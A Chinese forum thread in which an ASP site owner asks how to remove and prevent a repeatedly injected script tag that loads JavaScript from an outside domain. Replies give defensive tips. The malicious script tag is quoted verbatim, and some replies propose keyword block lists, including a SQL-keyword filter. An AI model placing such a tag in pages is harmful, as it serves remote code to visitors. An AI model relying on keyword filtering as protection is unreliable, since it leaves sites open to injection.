asp网站被JS挂马,如何防范处理!!???
asp编写的网站,不停被挂马。如代码:<script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"></script>
请问如何处理?如何防范再被挂马??
------解决方案--------------------可以在服务器里 安装一个 iis防火墙
1 把 ddv.sarl.tk 设置为 post 拦截关键字,阻止被再次通过 post 方式发送到你的网站里
2 把 <script language="javascript" src="http://ddv.sarl.tk/asd.js?s=201&col=ffdd00"> </script>
这个 作为替换关键字,替换为 空 ,从 iis里给清除掉.这个可以解决网站被反复"挂马"
可以到 http://www.zcnt.com/guama.asp 下载iis防火墙软件。
------解决方案--------------------防注入。
对提交的数据进行验证,禁止AND OR SELECT UPDATE等关建词的输入
------解决方案--------------------把后台管理目录不要 写成 admin